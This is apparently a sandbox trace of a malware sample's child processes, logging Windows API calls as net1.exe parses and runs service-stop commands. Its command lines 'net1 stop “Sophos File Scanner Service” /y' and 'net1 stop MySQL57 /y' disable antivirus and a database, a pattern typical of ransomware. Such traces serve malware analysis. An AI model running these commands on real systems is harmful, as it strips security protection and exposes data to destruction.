[0128.647] LocalFree (hMem=0x309520) returned 0x0 [0128.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x19 [0128.647] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET CONTINUE\r\nse", _MaxCount=0x10) returned 16 [0128.647] LocalFree (hMem=0x309520) returned 0x0 [0128.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x1b [0128.647] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET FILE\r\n[id [/", _MaxCount=0x10) returned 13 [0128.647] LocalFree (hMem=0x309520) returned 0x0 [0128.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0xbe [0128.647] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET GROUP\r\n[grou", _MaxCount=0x10) returned 12 [0128.647] LocalFree (hMem=0x309520) returned 0x0 [0128.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x33 [0128.647] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET HELP\r\ncomman", _MaxCount=0x10) returned 11 [0128.647] LocalFree (hMem=0x309520) returned 0x0 [0128.647] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x19 [0128.647] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET HELPMSG\r\nmes", _MaxCount=0x10) returned 11 [0128.647] LocalFree (hMem=0x309520) returned 0x0 [0128.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0xc1 [0128.648] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET LOCALGROUP\r\n", _MaxCount=0x10) returned 7 [0128.648] LocalFree (hMem=0x309520) returned 0x0 [0128.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x16 [0128.648] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET PAUSE\r\nservi", _MaxCount=0x10) returned 3 [0128.648] LocalFree (hMem=0x309520) returned 0x0 [0128.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x33 [0128.648] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET SESSION\r\n[\\\\", _MaxCount=0x10) returned 15 [0128.648] LocalFree (hMem=0x309520) returned 0x0 [0128.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x234 [0128.648] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET SHARE\r\nshare", _MaxCount=0x10) returned 12 [0128.648] LocalFree (hMem=0x309520) returned 0x0 [0128.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x13 [0128.648] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START BROWSE", _MaxCount=0x10) returned 14 [0128.648] LocalFree (hMem=0x309520) returned 0x0 [0128.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x14 [0128.648] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START CLIPBO", _MaxCount=0x10) returned 14 [0128.648] LocalFree (hMem=0x309520) returned 0x0 [0128.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x14 [0128.648] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START EVENTL", _MaxCount=0x10) returned 14 [0128.648] LocalFree (hMem=0x309520) returned 0x0 [0128.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x15 [0128.648] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START MESSEN", _MaxCount=0x10) returned 14 [0128.648] LocalFree (hMem=0x309520) returned 0x0 [0128.648] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x15 [0128.648] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START NET LO", _MaxCount=0x10) returned 14 [0128.648] LocalFree (hMem=0x309520) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="锠0⡋盺)锠0)") returned 0x16 [0128.649] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START RPCLOC", _MaxCount=0x10) returned 14 [0128.649] LocalFree (hMem=0x309520) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="䰨0⡋盺)锠0)") returned 0x11 [0128.649] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START RPCSS\r", _MaxCount=0x10) returned 14 [0128.649] LocalFree (hMem=0x304c28) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)䰨0)") returned 0x14 [0128.649] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START SCHEDU", _MaxCount=0x10) returned 14 [0128.649] LocalFree (hMem=0x30b520) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x12 [0128.649] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START SERVER", _MaxCount=0x10) returned 14 [0128.649] LocalFree (hMem=0x30b520) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0xf [0128.649] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START UPS\r\n", _MaxCount=0x10) returned 14 [0128.649] LocalFree (hMem=0x30b520) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x17 [0128.649] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START WORKST", _MaxCount=0x10) returned 14 [0128.649] LocalFree (hMem=0x30b520) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x18 [0128.649] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET START\r\n[serv", _MaxCount=0x10) returned 14 [0128.649] LocalFree (hMem=0x30b520) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x2a [0128.649] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET STATISTICS\r\n", _MaxCount=0x10) returned 14 [0128.649] LocalFree (hMem=0x30b520) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x15 [0128.649] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET STOP\r\nservic", _MaxCount=0x10) returned 19 [0128.649] LocalFree (hMem=0x30b520) returned 0x0 [0128.649] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x58 [0128.650] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET TIME\r\n\r\n[\\\\c", _MaxCount=0x10) returned -1 [0128.650] LocalFree (hMem=0x30b520) returned 0x0 [0128.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x184 [0128.650] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET USE\r\n[device", _MaxCount=0x10) returned -2 [0128.650] LocalFree (hMem=0x30b520) returned 0x0 [0128.650] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0xc7 [0128.650] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET USER\r\n[usern", _MaxCount=0x10) returned -2 [0128.650] LocalFree (hMem=0x30b520) returned 0x0 [0128.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x47 [0128.651] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET VIEW\r\n[\\\\com", _MaxCount=0x10) returned -3 [0128.651] LocalFree (hMem=0x30b520) returned 0x0 [0128.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0xc2 [0128.651] _wcsnicmp (_String1="NET stop “Sophos", _String2="NET\r\n [ ACCOU", _MaxCount=0x10) returned 19 [0128.651] LocalFree (hMem=0x30b520) returned 0x0 [0128.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x319 [0128.651] _wcsnicmp (_String1="NET stop “Sophos", _String2="SERVICES\r\nNET ST", _MaxCount=0x10) returned -5 [0128.651] LocalFree (hMem=0x30b520) returned 0x0 [0128.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x483 [0128.651] _wcsnicmp (_String1="NET stop “Sophos", _String2="SYNTAX\r\nThe foll", _MaxCount=0x10) returned -5 [0128.651] LocalFree (hMem=0x30b520) returned 0x0 [0128.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0xa86 [0128.651] _wcsnicmp (_String1="NET stop “Sophos", _String2="NAMES\r\nThe follo", _MaxCount=0x10) returned 4 [0128.651] LocalFree (hMem=0x30b520) returned 0x0 [0128.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x54 [0128.651] _wcsnicmp (_String1="NET stop “Sophos", _String2="\r\nFor more infor", _MaxCount=0x10) returned 97 [0128.651] LocalFree (hMem=0x30b520) returned 0x0 [0128.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0xad [0128.651] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0128.651] LocalFree (hMem=0x30b520) returned 0x0 [0128.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x2e [0128.651] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0128.651] LocalFree (hMem=0x30b520) returned 0x0 [0128.651] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x7d [0128.652] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0128.652] LocalFree (hMem=0x30b520) returned 0x0 [0128.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x26 [0128.652] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0128.652] LocalFree (hMem=0x30b520) returned 0x0 [0128.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x19 [0128.652] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0128.652] LocalFree (hMem=0x30b520) returned 0x0 [0128.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x1b [0128.652] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0128.652] LocalFree (hMem=0x30b520) returned 0x0 [0128.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0xbe [0128.652] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0128.652] LocalFree (hMem=0x30b520) returned 0x0 [0128.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x33 [0128.652] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0128.652] LocalFree (hMem=0x30b520) returned 0x0 [0128.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x19 [0128.652] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0128.652] LocalFree (hMem=0x30b520) returned 0x0 [0128.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0xc1 [0128.652] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0128.652] LocalFree (hMem=0x30b520) returned 0x0 [0128.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x16 [0128.652] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0128.652] LocalFree (hMem=0x30b520) returned 0x0 [0128.652] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x33 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0128.653] LocalFree (hMem=0x30b520) returned 0x0 [0128.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x234 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0128.653] LocalFree (hMem=0x30b520) returned 0x0 [0128.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x13 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.653] LocalFree (hMem=0x30b520) returned 0x0 [0128.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x14 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.653] LocalFree (hMem=0x30b520) returned 0x0 [0128.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x14 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.653] LocalFree (hMem=0x30b520) returned 0x0 [0128.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x15 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.653] LocalFree (hMem=0x30b520) returned 0x0 [0128.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x15 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.653] LocalFree (hMem=0x30b520) returned 0x0 [0128.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x16 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.653] LocalFree (hMem=0x30b520) returned 0x0 [0128.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="䰨0⡋盺)딠0)") returned 0x11 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.653] LocalFree (hMem=0x304c28) returned 0x0 [0128.653] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)䰨0)") returned 0x14 [0128.653] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.654] LocalFree (hMem=0x30b520) returned 0x0 [0128.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x12 [0128.654] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.654] LocalFree (hMem=0x30b520) returned 0x0 [0128.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0xf [0128.654] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.654] LocalFree (hMem=0x30b520) returned 0x0 [0128.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x17 [0128.654] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.654] LocalFree (hMem=0x30b520) returned 0x0 [0128.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x18 [0128.654] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0128.654] LocalFree (hMem=0x30b520) returned 0x0 [0128.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x2a [0128.654] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0128.654] LocalFree (hMem=0x30b520) returned 0x0 [0128.654] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x29f708, nSize=0x0, Arguments=0x29f704 | out: lpBuffer="딠0⡋盺)딠0)") returned 0x15 [0128.654] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0128.654] GetFileType (hFile=0x0) returned 0x0 [0128.654] GetConsoleOutputCP () returned 0x1b5 [0128.737] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0128.737] malloc (_Size=0x16) returned 0x5826e0 [0128.737] GetConsoleOutputCP () returned 0x1b5 [0128.737] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x5826e0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0128.737] WriteFile (in: hFile=0x0, lpBuffer=0x5826e0, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x29f724, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29f724, lpOverlapped=0x0) returned 0 [0128.737] free (_Block=0x5826e0) [0128.737] LocalFree (hMem=0x30b520) returned 0x0 [0128.738] NetApiBufferFree (Buffer=0x301b18) returned 0x0 [0128.738] NetApiBufferFree (Buffer=0x301b30) returned 0x0 [0128.738] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Sophos File Scanner Service” /y" [0128.738] exit (_Code=1) Process: id = "315" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x68e21000" os_pid = "0xf88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "172" os_parent_pid = "0x11d8" cmd_line = "C:\\Windows\\system32\\net1 stop MySQL57 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 723 os_tid = 0xad8 [0128.450] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fee4 | out: lpSystemTimeAsFileTime=0x14fee4*(dwLowDateTime=0x204dff70, dwHighDateTime=0x1d6f0d1)) [0128.450] GetCurrentProcessId () returned 0xf88 [0128.450] GetCurrentThreadId () returned 0xad8 [0128.450] GetTickCount () returned 0x1153573 [0128.450] QueryPerformanceCounter (in: lpPerformanceCount=0x14fedc | out: lpPerformanceCount=0x14fedc*=24755119012) returned 1 [0128.451] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0128.451] __set_app_type (_Type=0x1) [0128.451] __p__fmode () returned 0x770331f4 [0128.451] __p__commode () returned 0x770331fc [0128.451] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0128.451] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0128.451] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.451] GetConsoleOutputCP () returned 0x1b5 [0128.452] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0128.452] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.455] sprintf_s (in: _DstBuf=0x14fe9c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0128.455] setlocale (category=0, locale=".437") returned="English_United States.437" [0128.457] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3e0 [0128.457] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.457] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MySQL57 /y" [0128.457] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14fc68, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0128.458] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x62) returned 0x3c3ad0 [0128.458] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0128.458] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fe6c | out: Buffer=0x14fe6c*=0x3c1ad8) returned 0x0 [0128.458] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fe6c | out: Buffer=0x14fe6c*=0x3c1af0) returned 0x0 [0128.458] 